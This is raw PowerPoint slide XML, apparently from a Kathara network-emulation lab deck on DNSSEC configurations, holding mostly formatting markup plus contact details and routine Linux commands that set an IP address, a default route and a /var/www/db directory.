                        <a:spcAft>
                          <a:spcPct val="0"/>
                        </a:spcAft>
                        <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:defRPr>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                        </a:defRPr>
                      </a:lvl6pPr>
                      <a:lvl7pPr fontAlgn="base">
                        <a:spcBef>
                          <a:spcPct val="20000"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPct val="0"/>
                        </a:spcAft>
                        <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:defRPr>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                        </a:defRPr>
                      </a:lvl7pPr>
                      <a:lvl8pPr fontAlgn="base">
                        <a:spcBef>
                          <a:spcPct val="20000"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPct val="0"/>
                        </a:spcAft>
                        <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:defRPr>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                        </a:defRPr>
                      </a:lvl8pPr>
                      <a:lvl9pPr fontAlgn="base">
                        <a:spcBef>
                          <a:spcPct val="20000"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPct val="0"/>
                        </a:spcAft>
                        <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:defRPr>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tabLst/>
                      </a:pPr>
                      <a:r>
                        <a:rPr kumimoji="0" lang="en-US" sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" noProof="0" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>contact@kathara.org</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="90000" marR="90000" marT="46769" marB="467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41188">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle>
                      <a:lvl1pPr>
                        <a:spcBef>
                          <a:spcPct val="20000"/>
                        </a:spcBef>
                        <a:buClr>
                          <a:schemeClr val="tx2"/>
                        </a:buClr>
                        <a:buSzPct val="70000"/>
                        <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                        <a:defRPr sz="2800">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                        </a:defRPr>
                      </a:lvl1pPr>
                      <a:lvl2pPr>
                        <a:spcBef>
                          <a:spcPct val="20000"/>
                        </a:spcBef>
                        <a:buClr>
                          <a:schemeClr val="accent1"/>
                        </a:buClr>
                        <a:buSzPct val="70000"/>
                        <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                        <a:defRPr sz="2400">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                        </a:defRPr>
                      </a:lvl2pPr>
                      <a:lvl3pPr>
                        <a:spcBef>
                          <a:spcPct val="20000"/>
                        </a:spcBef>
                        <a:buClr>
                          <a:srgbClr val="66CC00"/>
                        </a:buClr>
                        <a:buSzPct val="70000"/>
                        <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                        <a:defRPr sz="2000">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                        </a:defRPr>
                      </a:lvl3pPr>
                      <a:lvl4pPr>
                        <a:spcBef>
                          <a:spcPct val="20000"/>
                        </a:spcBef>
                        <a:buSzPct val="70000"/>
                        <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                        <a:defRPr>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                        </a:defRPr>
                      </a:lvl4pPr>
                      <a:lvl5pPr>
                        <a:spcBef>
                          <a:spcPct val="20000"/>
                        </a:spcBef>
                        <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:defRPr>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                        </a:defRPr>
                      </a:lvl5pPr>
                      <a:lvl6pPr fontAlgn="base">
                        <a:spcBef>
                          <a:spcPct val="20000"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPct val="0"/>
                        </a:spcAft>
                        <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:defRPr>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                        </a:defRPr>
                      </a:lvl6pPr>
                      <a:lvl7pPr fontAlgn="base">
                        <a:spcBef>
                          <a:spcPct val="20000"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPct val="0"/>
                        </a:spcAft>
                        <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:defRPr>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                        </a:defRPr>
                      </a:lvl7pPr>
                      <a:lvl8pPr fontAlgn="base">
                        <a:spcBef>
                          <a:spcPct val="20000"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPct val="0"/>
                        </a:spcAft>
                        <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:defRPr>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                        </a:defRPr>
                      </a:lvl8pPr>
                      <a:lvl9pPr fontAlgn="base">
                        <a:spcBef>
                          <a:spcPct val="20000"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPct val="0"/>
                        </a:spcAft>
                        <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:defRPr>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tabLst/>
                      </a:pPr>
                      <a:r>
                        <a:rPr kumimoji="0" lang="en-US" sz="1600" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" noProof="0" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Web</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="90000" marR="90000" marT="46769" marB="467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70000"/>
                        <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                        <a:defRPr sz="2800">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                        </a:defRPr>
                      </a:lvl1pPr>
                      <a:lvl2pPr>
                        <a:spcBef>
                          <a:spcPct val="20000"/>
                        </a:spcBef>
                        <a:buClr>
                          <a:schemeClr val="accent1"/>
                        </a:buClr>
                        <a:buSzPct val="70000"/>
                        <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                        <a:defRPr sz="2400">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                        </a:defRPr>
                      </a:lvl2pPr>
                      <a:lvl3pPr>
                        <a:spcBef>
                          <a:spcPct val="20000"/>
                        </a:spcBef>
                        <a:buClr>
                          <a:srgbClr val="66CC00"/>
                        </a:buClr>
                        <a:buSzPct val="70000"/>
                        <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                        <a:defRPr sz="2000">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                        </a:defRPr>
                      </a:lvl3pPr>
                      <a:lvl4pPr>
                        <a:spcBef>
                          <a:spcPct val="20000"/>
                        </a:spcBef>
                        <a:buSzPct val="70000"/>
                        <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                        <a:defRPr>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                        </a:defRPr>
                      </a:lvl4pPr>
                      <a:lvl5pPr>
                        <a:spcBef>
                          <a:spcPct val="20000"/>
                        </a:spcBef>
                        <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:defRPr>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                        </a:defRPr>
                      </a:lvl5pPr>
                      <a:lvl6pPr fontAlgn="base">
                        <a:spcBef>
                          <a:spcPct val="20000"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPct val="0"/>
                        </a:spcAft>
                        <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:defRPr>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                        </a:defRPr>
                      </a:lvl6pPr>
                      <a:lvl7pPr fontAlgn="base">
                        <a:spcBef>
                          <a:spcPct val="20000"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPct val="0"/>
                        </a:spcAft>
                        <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:defRPr>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                        </a:defRPr>
                      </a:lvl7pPr>
                      <a:lvl8pPr fontAlgn="base">
                        <a:spcBef>
                          <a:spcPct val="20000"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPct val="0"/>
                        </a:spcAft>
                        <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:defRPr>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                        </a:defRPr>
                      </a:lvl8pPr>
                      <a:lvl9pPr fontAlgn="base">
                        <a:spcBef>
                          <a:spcPct val="20000"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPct val="0"/>
                        </a:spcAft>
                        <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:defRPr>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tabLst/>
                      </a:pPr>
                      <a:r>
                        <a:rPr kumimoji="0" lang="en-US" sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" noProof="0" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>http://www.kathara.org/</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="90000" marR="90000" marT="46769" marB="467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836488">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle>
                      <a:lvl1pPr>
                        <a:spcBef>
                          <a:spcPct val="20000"/>
                        </a:spcBef>
                        <a:buClr>
                          <a:schemeClr val="tx2"/>
                        </a:buClr>
                        <a:buSzPct val="70000"/>
                        <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                        <a:defRPr sz="2800">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                        </a:defRPr>
                      </a:lvl1pPr>
                      <a:lvl2pPr>
                        <a:spcBef>
                          <a:spcPct val="20000"/>
                        </a:spcBef>
                        <a:buClr>
                          <a:schemeClr val="accent1"/>
                        </a:buClr>
                        <a:buSzPct val="70000"/>
                        <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                        <a:defRPr sz="2400">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                        </a:defRPr>
                      </a:lvl2pPr>
                      <a:lvl3pPr>
                        <a:spcBef>
                          <a:spcPct val="20000"/>
                        </a:spcBef>
                        <a:buClr>
                          <a:srgbClr val="66CC00"/>
                        </a:buClr>
                        <a:buSzPct val="70000"/>
                        <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                        <a:defRPr sz="2000">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                        </a:defRPr>
                      </a:lvl3pPr>
                      <a:lvl4pPr>
                        <a:spcBef>
                          <a:spcPct val="20000"/>
                        </a:spcBef>
                        <a:buSzPct val="70000"/>
                        <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                        <a:defRPr>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                        </a:defRPr>
                      </a:lvl4pPr>
                      <a:lvl5pPr>
                        <a:spcBef>
                          <a:spcPct val="20000"/>
                        </a:spcBef>
                        <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:defRPr>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                        </a:defRPr>
                      </a:lvl5pPr>
                      <a:lvl6pPr fontAlgn="base">
                        <a:spcBef>
                          <a:spcPct val="20000"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPct val="0"/>
                        </a:spcAft>
                        <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:defRPr>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                        </a:defRPr>
                      </a:lvl6pPr>
                      <a:lvl7pPr fontAlgn="base">
                        <a:spcBef>
                          <a:spcPct val="20000"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPct val="0"/>
                        </a:spcAft>
                        <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:defRPr>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                        </a:defRPr>
                      </a:lvl7pPr>
                      <a:lvl8pPr fontAlgn="base">
                        <a:spcBef>
                          <a:spcPct val="20000"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPct val="0"/>
                        </a:spcAft>
                        <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:defRPr>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                        </a:defRPr>
                      </a:lvl8pPr>
                      <a:lvl9pPr fontAlgn="base">
                        <a:spcBef>
                          <a:spcPct val="20000"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPct val="0"/>
                        </a:spcAft>
                        <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:defRPr>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tabLst/>
                      </a:pPr>
                      <a:r>
                        <a:rPr kumimoji="0" lang="en-US" sz="1600" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" noProof="0" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Description</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="90000" marR="90000" marT="46769" marB="467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70000"/>
                        <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                        <a:defRPr sz="2800">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                        </a:defRPr>
                      </a:lvl1pPr>
                      <a:lvl2pPr>
                        <a:spcBef>
                          <a:spcPct val="20000"/>
                        </a:spcBef>
                        <a:buClr>
                          <a:schemeClr val="accent1"/>
                        </a:buClr>
                        <a:buSzPct val="70000"/>
                        <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                        <a:defRPr sz="2400">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                        </a:defRPr>
                      </a:lvl2pPr>
                      <a:lvl3pPr>
                        <a:spcBef>
                          <a:spcPct val="20000"/>
                        </a:spcBef>
                        <a:buClr>
                          <a:srgbClr val="66CC00"/>
                        </a:buClr>
                        <a:buSzPct val="70000"/>
                        <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                        <a:defRPr sz="2000">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                        </a:defRPr>
                      </a:lvl3pPr>
                      <a:lvl4pPr>
                        <a:spcBef>
                          <a:spcPct val="20000"/>
                        </a:spcBef>
                        <a:buSzPct val="70000"/>
                        <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                        <a:defRPr>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                        </a:defRPr>
                      </a:lvl4pPr>
                      <a:lvl5pPr>
                        <a:spcBef>
                          <a:spcPct val="20000"/>
                        </a:spcBef>
                        <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:defRPr>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                        </a:defRPr>
                      </a:lvl5pPr>
                      <a:lvl6pPr fontAlgn="base">
                        <a:spcBef>
                          <a:spcPct val="20000"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPct val="0"/>
                        </a:spcAft>
                        <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:defRPr>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                        </a:defRPr>
                      </a:lvl6pPr>
                      <a:lvl7pPr fontAlgn="base">
                        <a:spcBef>
                          <a:spcPct val="20000"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPct val="0"/>
                        </a:spcAft>
                        <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:defRPr>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                        </a:defRPr>
                      </a:lvl7pPr>
                      <a:lvl8pPr fontAlgn="base">
                        <a:spcBef>
                          <a:spcPct val="20000"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPct val="0"/>
                        </a:spcAft>
                        <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:defRPr>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                        </a:defRPr>
                      </a:lvl8pPr>
                      <a:lvl9pPr fontAlgn="base">
                        <a:spcBef>
                          <a:spcPct val="20000"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPct val="0"/>
                        </a:spcAft>
                        <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:defRPr>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tabLst/>
                      </a:pPr>
                      <a:r>
                        <a:rPr kumimoji="0" lang="en-US" sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" noProof="0" dirty="0" err="1">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>dnssec</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr kumimoji="0" lang="en-US" sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" noProof="0" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> configurations</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="90000" marR="90000" marT="46769" marB="467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
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FF9EE336-8C6A-EE6F-6B60-0806E93BC623}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="3451276" y="2165667"/>
            <a:ext cx="5289448" cy="2526665"/>
            <a:chOff x="126" y="3294"/>
            <a:chExt cx="5943" cy="778"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="AutoShape 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{50CE517C-1BF6-0183-1E3C-CB611CE73B6E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="126" y="3352"/>
              <a:ext cx="5943" cy="720"/>
            </a:xfrm>
            <a:prstGeom prst="foldedCorner">
              <a:avLst>
                <a:gd name="adj" fmla="val 8278"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
            <a:ln w="19050">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
            <a:effectLst>
              <a:outerShdw dist="107763" dir="2700000" algn="ctr" rotWithShape="0">
                <a:schemeClr val="bg2"/>
              </a:outerShdw>
            </a:effectLst>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none"/>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endParaRPr lang="en-US" sz="1600" b="1" noProof="0" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>ip</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> address add 110.0.0.50/24 dev eth0</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>ip</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> route add default via 110.0.0.3</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>mkdir</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> -p /var/www/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>db</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>chown</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> -R </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>www-data:www-data</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> /var/www/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>db</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1">
